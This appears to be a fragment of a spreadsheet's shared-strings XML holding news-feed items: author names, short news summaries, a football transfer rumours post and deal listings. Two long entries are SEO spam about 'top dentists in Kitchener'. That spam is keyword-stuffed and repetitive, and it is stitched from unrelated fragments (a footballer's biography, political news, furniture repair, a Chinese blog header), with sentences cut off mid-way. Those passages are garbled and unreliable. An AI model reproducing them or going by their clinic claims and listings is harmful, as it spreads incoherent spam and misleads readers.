    <t>Rachel Eddie</t>
  </si>
  <si>
    <t>A security guard was brutally bashed and had his vehicle stolen after stopping to check if the occupants of a car involved in two crashes were okay.</t>
  </si>
  <si>
    <t>95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and understand the importance. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. Highest Rated Dental Clinic Near Kitchener Most Popular Dental Clinic In Kitchener Most Popular Dental Clinic Near Kitchener Locating an Orthomolecular Provider. Top Dentist Near Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have It’s. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Highest Rated Dental Clinic In Kitchener BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. They also wanted to design a product that would translate from educational settings to dental clinics. With these hands. . Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. KITCHENER. where the family already struggles with a. Highest Rated Dental Clinic In Kitchener Chamblee, GA – Yi-Tsu Cheng, D.D.S. &amp; Associates is one of the top-rated and reliable dental treatment and care clinics in Chamblee, GA. Having been in existence for years, Yi-Tsu Cheng. Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. Preferred Dentist Near Kitchener Preferred Dental Clinic In Kitchener Ontario Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s needs and with children of. Preferred Dental Clinic In Kitchener Ontario Best Dentist -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2018/12/31/preferred-dental-clinic-in-kitchener-ontario-6. Kid Friendly Dental Clinic In Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, We focus on family and cosmetic dentistry and use the latest technologies and techniques in the dental industry. Our friendly. Cosmetic Dental Clinic In Kitchener Kitchener dentists, Dr. Tabita Ilitoi, Dr. Roxana Ghergari, Dr. Farvah Sayyad, Dr. Sorin Mitrana &amp; Dr. Moetaz El-Hag, offer comprehensive dental treatment for numerous conditions. Whether your needs are a simple dental exam and cleaning, or a complex cosmetic. Locate and compare cosmetic dentistry in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Please enter what you're searching for Please enter your search location. Highest Rated Dentist In Kitchener . a finalist two times for the Dental Practice of the Year South and has been selected as one of the best dentists in London by Three Best Rated. The team at Progressive Dentistry is dedicated to. Billed as “Nature’s whitening toothpaste,” Cali White Activated Charcoal and Organic Coconut Oil Toothpaste is a top-rated. Pure Smiles Dentistry Named 2019 Top Patient Rated Marietta Dentist by Find Local Doctors – Superior reviews and five-star ratings left by actual patients of Pure Smiles Dentistry can be found across multiple credible review sources. This has led Find Local Doctors to recognize the Marietta. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. best of all – complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t. Best Dental Clinic Near Kitchener We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral dental care (cleaning) at. Think Twice Before Buying Private Dental Insurance – How to Save Money On Dental Care With or without dental insurance, there are many ways to make dental care more affordable. Most Popular Dental Clinic In Kitchener India- Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – Dr. Stephanie Wright and Dr. Angela Greenaway decided to start a private dental practice. one of the most popular services. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Preferred Dental Clinic In Kitchener In some cases, this makes breastfeeding harder and, in even rarer cases, could affect dental health or speech later in. Best Dental Clinic In Kitchener Ontario Cosmetic Dentist In Kitchener Ontario Number 1 Dental Clinic Near Kitchener Highland Dental Clinic (1.8 km) 200 Highland Rd W Kitchener, ON, N2M 3C2 519-570-1001 Kitchener Dentists Dental Office (1.8 km). 966 King St W Kitchener Kitchener, ON, N2G 1G4 519-579-3300 Kitchener Dentists Rodrigues Conrad Dr (2.0 km) 519-743. Tyler’s Ridge Shops Break Ground Near Airport – Both can accommodate indoor and outdoor seating areas, and one includes a dedicated drive-thru. “We are actively pursuing all. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new. Preferred Dentist Near Kitchener Coupled with healthy feeding of the child, it is paramount that you also take good care of their dental hygiene. Newborn. ATLANTA — President Donald Trump’s administration is evaluating vacant properties near five U.S. cities as potential. Let us help you find the perfect dentist Go Best of 2019 – Dentists in Kitchener, ON Best of 2019 – Dentists in Kitchener, ON Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. Finding A Good Dentist Is Not That Easy – He can likewise assist you to a sanitary strategy at home towards dental wellness. There are numerous indicate consider before you choose any dentist, nevertheless. First of all, you must discover a. He was even morbidly afraid of showing any feeling or enthusiasm, and he preferred to be misunderstood rather than be. Kid Friendly Dentist In Kitchener Included on their page are numerous photos which signal the importance of their family, whether actually related or part of. KPL career workshops help guide newcomer youth through future in Kitchener – A "summer camp" underway at Kitchener Public Library is helping newcomer youth. our adult resources but also we see a lot. Friendliest Dentist Near Kitchener Ontario Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. More moon memories: Readers recall the lunar landing – Alas, instead of offering coverage of the space mission, the single channel available in the Saguenay Valley was showing a. Dental Implants in Kitchener, ON (Results 1 – 20 of 20) Switch to Map 43.4237401,-80.5527645 Dawson Dental Centre – Kitchener Dentist Ontario, 235 Ira Needles Blvd N2N 3K6 Kitchener (519) 742-2010 Open Opening Hours. Most Popular Dental Clinic In Kitchener Cosmetic Dental Clinic Near Kitchener Top Dentist Near Kitchener Best Dental Pick – How many times has the dental hygienist told you. It has hook scrapers on either end to help get between your teeth and. Dr. Vera Etches, the unit’s top doctor, said that in 2016 and 2017. Point Pelee National Park near Windsor was considered. Data collected will only. from: jobsdb.com – 2 days ago Similar: medical doctor hong kong, Top Dentist Near Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t fear, we’re. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Cosmetic Dental Clinic In Kitchener 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and understand the importance. Top Dentist In Kitchener Why most mid-century modern furniture is worth repairing – Acetone would almost certainly ruin the finish. Instead, the best method is to scrape off the glue. Haridi said he would use. Cosmetic Dental Clinic Near Kitchener Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. Cosmetic Dentist Near Kitchener . dental work with the use of sedation while you can improve the overall look with cosmetic. Friendliest Dental Clinic Near Kitchener Ontario cornekiuse的部落格 跳到主文 歡迎光臨cornekiuse在痞客邦的小天地 , near Ottawa. At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. "What matters to me is the care I give to my patients," wrote Armogan, who operates out of OCC Eyecare, with its main clinic. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/. At our Kitchener clinic, we offer complete dental care services that will make sure that your teeth remain strong and in good condition. Find Cosmetic Dentistry near you Companies having. web (15) email (14) verified listing (2) opening hours (16) Categories. With porcelain veneers placed at a clinic such as Sunnylane Family Dentistry, patients can see their smile rejuvenated and. Silman’s Smiles Spas are dedicated to providing the best possible dental service to Northeastern New Jersey individuals and their families. They perform general dentistry services as well as. Bill and Eleanor Seavey run a small inn near Hearst Castle in California. Arizona, for some sun – and dental work. “Many. Highest Rated Dental Clinic In Kitchener Ontario Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full. Closing arguments. The pair is facing a. Pharmacists in Ontario Highest Rated Dentist In Kitchener Ontario Here is the definitive. Cosmetic Dental Clinic Near Kitchener Ontario King Street Dental Centre is a dental clinic in Waterloo &amp; Kitchener. Our Waterloo dentist provides cosmetic and general dentistry treatments to your oral health. Book an appointment today. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. They’re Ontario’s top-billing doctors, but for years their identities have been kept secret. Until now – He’s Ontario’s highest billing doctor. who operates out of OCC Eyecare, with its main clinic located in an industrial area. Friendliest Dentist Near Kitchener Ontario The dental implants and prosthetics market is anticipated to grow with a significant rate in the coming years, owing to facto. Trying to choose a family dentist in Guelph? Harvard Rd Dental Care makes the decision easy. We’re committed to providing. Also, outlet malls in King Street Dental Centre is a dental clinic in Waterloo &amp; Kitchener. Our Waterloo dentist provides cosmetic and general dentistry treatments to your oral health. Book an appointment today. Number 1 Dental Clinic Near Kitchener Ontario Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Road South, Unit #203 Kitchener, Ontario, Canada N2C 2N9 519-893-9494 Emergency Dental Center – Waterloo 258 King Street North, Unit #7 Waterloo, Ontario, Canada, N2J 2Y9 519-883-0505. Urgent Care Clinic, Kitchener, Ontario. 28 likes · 1,373 were here. Hospital Jump to Sections of this page Accessibility Help Press alt + / to open this menu Facebook. Walk-In Clinic in Kitchener We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Clinic with X-ray, lab facilities and pharmacy on site. We are open seven days a week and have been since 1990. With our history and. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, from children to grandparents. Top Dentist In Kitchener Ontario Highest Rated Dental Clinic In Kitchener BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. They also wanted to design a product that would translate from educational settings to dental clinics. With these hands. . Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. KITCHENER. where the family already struggles with a. Highest Rated Dental Clinic In Kitchener Chamblee, GA – Yi-Tsu Cheng, D.D.S. &amp; Associates is one of the top-rated and reliable dental treatment and care clinics in Chamblee, GA. Having been in existence for years, Yi-Tsu Cheng. Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Ro...</t>
  </si>
  <si>
    <t>Nathan Lustig</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V One of my most popular blog posts is my eCommerce case study from when some friends and I started an eCommerce business in 2012. It gets hundreds of … source</t>
  </si>
  <si>
    <t>While Johnson wants his country to leave the European Union and Turkey would like to join it, villagers in Kalfat, see opportunities for common ground.</t>
  </si>
  <si>
    <t>Tony Moore</t>
  </si>
  <si>
    <t>Stanthorpe could run out of water by Christmas, with ratepayers facing a monthly $1 million bill to cart water from nearby Warwick. However, without significant rain, Warwick itself could be out of water by December 2020.</t>
  </si>
  <si>
    <t>. a finalist two times for the Dental Practice of the Year South and has been selected as one of the best dentists in London by Three Best Rated. The team at Progressive Dentistry is dedicated to. Billed as “Nature’s whitening toothpaste,” Cali White Activated Charcoal and Organic Coconut Oil Toothpaste is a top-rated. Pure Smiles Dentistry Named 2019 Top Patient Rated Marietta Dentist by Find Local Doctors – Superior reviews and five-star ratings left by actual patients of Pure Smiles Dentistry can be found across multiple credible review sources. This has led Find Local Doctors to recognize the Marietta. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. best of all – complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t. Best Dental Clinic Near Kitchener We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral dental care (cleaning) at. Think Twice Before Buying Private Dental Insurance – How to Save Money On Dental Care With or without dental insurance, there are many ways to make dental care more affordable. Most Popular Dental Clinic In Kitchener India- Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – Dr. Stephanie Wright and Dr. Angela Greenaway decided to start a private dental practice. one of the most popular services. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Preferred Dental Clinic In Kitchener In some cases, this makes breastfeeding harder and, in even rarer cases, could affect dental health or speech later in. Best Dental Clinic In Kitchener Ontario Cosmetic Dentist In Kitchener Ontario Number 1 Dental Clinic Near Kitchener Highland Dental Clinic (1.8 km) 200 Highland Rd W Kitchener, ON, N2M 3C2 519-570-1001 Kitchener Dentists Dental Office (1.8 km). 966 King St W Kitchener Kitchener, ON, N2G 1G4 519-579-3300 Kitchener Dentists Rodrigues Conrad Dr (2.0 km) 519-743. Tyler’s Ridge Shops Break Ground Near Airport – Both can accommodate indoor and outdoor seating areas, and one includes a dedicated drive-thru. “We are actively pursuing all. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new. Preferred Dentist Near Kitchener Coupled with healthy feeding of the child, it is paramount that you also take good care of their dental hygiene. Newborn. ATLANTA — President Donald Trump’s administration is evaluating vacant properties near five U.S. cities as potential. Let us help you find the perfect dentist Go Best of 2019 – Dentists in Kitchener, ON Best of 2019 – Dentists in Kitchener, ON Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. Finding A Good Dentist Is Not That Easy – He can likewise assist you to a sanitary strategy at home towards dental wellness. There are numerous indicate consider before you choose any dentist, nevertheless. First of all, you must discover a. He was even morbidly afraid of showing any feeling or enthusiasm, and he preferred to be misunderstood rather than be. Kid Friendly Dentist In Kitchener Included on their page are numerous photos which signal the importance of their family, whether actually related or part of. KPL career workshops help guide newcomer youth through future in Kitchener – A "summer camp" underway at Kitchener Public Library is helping newcomer youth. our adult resources but also we see a lot. Friendliest Dentist Near Kitchener Ontario Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. More moon memories: Readers recall the lunar landing – Alas, instead of offering coverage of the space mission, the single channel available in the Saguenay Valley was showing a. Dental Implants in Kitchener, ON (Results 1 – 20 of 20) Switch to Map 43.4237401,-80.5527645 Dawson Dental Centre – Kitchener Dentist Ontario, 235 Ira Needles Blvd N2N 3K6 Kitchener (519) 742-2010 Open Opening Hours. Most Popular Dental Clinic In Kitchener Cosmetic Dental Clinic Near Kitchener Top Dentist Near Kitchener Best Dental Pick – How many times has the dental hygienist told you. It has hook scrapers on either end to help get between your teeth and. Dr. Vera Etches, the unit’s top doctor, said that in 2016 and 2017. Point Pelee National Park near Windsor was considered. Data collected will only. from: jobsdb.com – 2 days ago Similar: medical doctor hong kong, Top Dentist Near Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t fear, we’re. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Cosmetic Dental Clinic In Kitchener 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and understand the importance. Top Dentist In Kitchener Why most mid-century modern furniture is worth repairing – Acetone would almost certainly ruin the finish. Instead, the best method is to scrape off the glue. Haridi said he would use. Cosmetic Dental Clinic Near Kitchener Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. Cosmetic Dentist Near Kitchener . dental work with the use of sedation while you can improve the overall look with cosmetic. Friendliest Dental Clinic Near Kitchener Ontario cornekiuse的部落格 跳到主文 歡迎光臨cornekiuse在痞客邦的小天地 , near Ottawa. At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. "What matters to me is the care I give to my patients," wrote Armogan, who operates out of OCC Eyecare, with its main clinic. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/. At our Kitchener clinic, we offer complete dental care services that will make sure that your teeth remain strong and in good condition. Find Cosmetic Dentistry near you Companies having. web (15) email (14) verified listing (2) opening hours (16) Categories. With porcelain veneers placed at a clinic such as Sunnylane Family Dentistry, patients can see their smile rejuvenated and. Silman’s Smiles Spas are dedicated to providing the best possible dental service to Northeastern New Jersey individuals and their families. They perform general dentistry services as well as. Bill and Eleanor Seavey run a small inn near Hearst Castle in California. Arizona, for some sun – and dental work. “Many. Highest Rated Dental Clinic In Kitchener Ontario Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full. Closing arguments. The pair is facing a. Pharmacists in Ontario Highest Rated Dentist In Kitchener Ontario Here is the definitive. Cosmetic Dental Clinic Near Kitchener Ontario King Street Dental Centre is a dental clinic in Waterloo &amp; Kitchener. Our Waterloo dentist provides cosmetic and general dentistry treatments to your oral health. Book an appointment today. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. They’re Ontario’s top-billing doctors, but for years their identities have been kept secret. Until now – He’s Ontario’s highest billing doctor. who operates out of OCC Eyecare, with its main clinic located in an industrial area. Friendliest Dentist Near Kitchener Ontario The dental implants and prosthetics market is anticipated to grow with a significant rate in the coming years, owing to facto. Trying to choose a family dentist in Guelph? Harvard Rd Dental Care makes the decision easy. We’re committed to providing. Also, outlet malls in Ontario. friendly environment, and that’s the best that can be done when retail vacancies become an. That Sudbury Sports Guy: Bringing out their best — Garrett Rank downs sibling Kyle to win Idylwylde Invitational – “I was doing my part to try and prevent a domestic dispute,” said Roberts with a laugh, the tournament regular travelling to Sudbury from his home in the Kitchener-Waterloo. playoff),” suggested. As you consider a dentist in Kitchener, ON, take some time to browse our website and familiarize yourself with our practice. Welcome to our General and Family Dentistry, located in Kitchener, Ontario. We offer a Emergency Dentistry, Pediatric Dentistry. Number 1 Dental Clinic Near Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, from children to grandparents. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Find useful information, the address and the phone number of the local business you are looking for. Kid Friendly Dental Clinic In Kitchener Same Day Emergency Appointments Sometimes dental emergencies happen and you’ll need a dentist you know can help you as soon as possible. We have a Kitchener location and a Waterloo location that both offer emergency appointments. Call the clinic. Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – Two of the most amazing offers that any dental clinic can give to. commitment not only to their family but to the entire. Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric clinic is equipped with child-friendly technology and dentistry tools. Our clinic is highly interactive, designed to give children a. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. The gamble paid off – James Hobson just bought a house in Kitchener, near the Waterloo border. Then. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. Another way to get children to like visiting dentists is to give children special treats after visiting dental clinics. A. The prized residential setting means that many locals also value having access to the best dental services that can be obtained for their family. In her review, Tricia G. of Carlsbad stated that they. India- Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – that is not available in other dental clinics. Fall Creek Dentistry is dedicated to providing excellent service and. Driven with their family-oriented philosophy, they treat every patient as part of their family which makes their dental clinic the perfect. Silman Smile Spa offers friendly and excellent. Kid Friendly Dentist Near Kitchener That is great, if you live near Ottawa Street in Kitchener and can enjoy. She lives on Margaret Avenue in Kitchener. To. Readers Choice: Kids – Unique toys, gifts and collectibles make this whimsical downtown spot and repeat SFR Best of Santa Fe winner a go-to for. Reviews on Kid Friendly Restaurants in Kitchener, ON – Fork and Cork Grill, J &amp; B Family Restaurant, Red House, The Bent Elbow, The Bauer Kitchen, The Adventurers' Guild Cafe, Moose Winooski's, Pupuseria Latinos, Country Boy Family Restaurant, 271. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the most complex needs, you can trust us to keep you smiling! From baby’s first tooth to the most complex needs, you can trust us to keep you smiling! Kid Friendly Dentist Highest Rated Dentist In Kitchener Edward Paul Sheringham MBE (born 2 April 1966) is an English football manager and former player. Sheringham played as a forward, mostly as a second striker, in a 24-year professional career. Sheringham began his career. Regarding her first experience at Tucker Dental Care – Dr. Cheng DDS, a new patient said, “I had the best experience with Dr. Cheng and her staff. I was nervous to see any dentist but once I was in. Highest Rated Dentist In Kitchener Edward Paul Sheringham MBE (born 2 April 1966) is an English football manager and former player. Sheringham played as a forward, mostly as a second striker, in a 24-year professional career. Sheringham began his career. Highest Rated Most Reviewed Distance Bird's-eye View Driving (8 km.) Biking (4 km.) Walking (2 km.) Within 4 blocks Price $ $$ $$$ $$$$ Features Open Now-:– am By Appointment Only Sponsored Results Harmony Dental Care 1 review. Reviews on Dentist Reviews in Kitchener, ON – Solar Dental, King Street Dental Centre, Waterloo Smiles Dentistry, Fairway Dental Urgent Care Clinic, Lackner Woods Family Dentistry, de Man &amp; Höediono Dentistry, Arvanitis &amp; Associates Dentistry by.</t>
  </si>
  <si>
    <t>Hannah Jackson</t>
  </si>
  <si>
    <t>As the manhunt continues, many are wondering if the suspects are in the wilderness, and if so, how they are managing to survive.</t>
  </si>
  <si>
    <t>Siobhan Heanue</t>
  </si>
  <si>
    <t>An Australian man who was working as a paragliding pilot has been arrested and charged over child sexual abuse in one of Nepal's most popular tourist spots.</t>
  </si>
  <si>
    <t>The inquiry comes as the Morrison government faced calls from the crossbench for a parliamentary inquiry.</t>
  </si>
  <si>
    <t>Jess Brady</t>
  </si>
  <si>
    <t>Officers say the incident happened on Sunday between 4:30 p.m. and 5 p.m. in the parking lot of a store on Broadway Avenue.</t>
  </si>
  <si>
    <t>Kate Stephens</t>
  </si>
  <si>
    <t>Tayah Wilson's depression left her in tatters but now she's a different person, thanks to a trial in Western Australia that has achieved huge successes in Europe.</t>
  </si>
  <si>
    <t>Transfer Rumours: AC Milan and Inter Milan MILAN, ITALY – MAY 26: Mauro Emanuel Icardi of FC Internazionale looks dejected during the Serie A match between FC Internazionale and Empoli FC at Stadio Giuseppe Meazza on May 26, 2019 in Milan, Italy. (Photo by Emilio Andreoli/Getty Images) Footy News’s Football Transfer News looks at the latest transfer rumours from around world football. In today’s edition, AC Milan‘s rebuild is taking shape and Mauro Icardi is still waiting around. European Transfer Rumours Milan Rebuild Taking Shape With just over a month to go in the transfer window, AC Milan still have a lot of business on the table. Paolo Maldini and Zvonimir Boban still have multiple arrivals and departures they want to complete before September 1. We told you about their interest in Angel Correa earlier this week, but he is just the start. This morning, Tuttosport reported that Milan are in serious discussion for young Lille sensation Rafael Leao. The Portuguese attacker is one of the hottest commodities in Europe, and Milan will have to pay Lille’s €35 million valuation for his service. However, it is not a figure they would be able to reach without a significant number of sales. According to Tuttosport, those sales include Andre Silva, Samu Castillejo, Patrick Cutrone, Suso and Fabio Borini. If Milan are going to sign Leao they will need to sell at least two of these players, if not more. Suso and Silva might bring in enough to sign both Leao and Correa, but selling only Borini and Cutrone won’t, so Milan are going to have to be skilled salesmen over the next month. Mauro Icardi Transfer Rumours Mauro Icardi is still training alone in Milan as he waits to find a resolution to his future. Inter Milan and Antonio Conte have made it clear that Icardi is not a part of their plan under any circumstances, but Icardi has made it clear to Inter that he will not accept a move outside of Italy, and his salary and price tag leaves only one or two options for his sale. These circumstances have led to Juventus being the club most heavily linked with a move for Icardi. Lately though, rumours of a move to Napoli have been gaining steam and today Gazzetta Dello Sport reported that Napoli have made their striker Arkadiusz Milik available in these talks. With this along with the latest Nicolas Pepe rumours, Sky Sports having reported that a fee for the winger is agreed with Lille, Napoli are set to make a serious Serie A charge. This post Transfer Rumours: AC Milan and Inter Milan appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>President Donald Trump agreed at a meeting with the heads of top technology companies like Google on Monday to make "timely" decisions on requests by U.S. companies to sell to blacklisted Huawei Technologies Co Ltd, the White House said.</t>
  </si>
  <si>
    <t>ilovefullprice</t>
  </si>
  <si>
    <t>Used to be only free first drink for new signups. Now you get one free drink per day for 7 days for new signups. Limited to a few bars/pubs/clubs/restaurants in Melbourne (credit to Sage): https://www.ozbargain.com.au/node/445548#comment-7076817</t>
  </si>
  <si>
    <t>Trump lashed out at China as trade talks resumed, taking credit for weakening China's economy and downplaying the likelihood of a deal before the 2020 election.</t>
  </si>
  <si>
    <t>10, 20 or 30 Pairs of Nipple Daisies Create a smooth line under any top or dress with these discreet, self-adhesive, disposable daisy-shaped, easy-to-apply nipple covers The post 10, 20 or 30 Pairs of Nipple Daisies appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>The New Orleans Pelicans have possibly the deepest, most talented roster in franchise history. Source: Sports Business News</t>
  </si>
  <si>
    <t>‘‘Right now, to be honest, I can’t really see myself anywhere else.’’ Those are the words from Tim Kelly that are set to bring a huge smile to the face of every Geelong supporter.</t>
  </si>
  <si>
    <t>Android Authority The post Best MediaTek phones (July 2019) appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Euro zone economic growth halved in the April-June period and inflation slowed sharply in July even though the unemployment rate fell to its lowest in 11 years, data from the European Union's statistics office showed on Wednesday.</t>
  </si>
  <si>
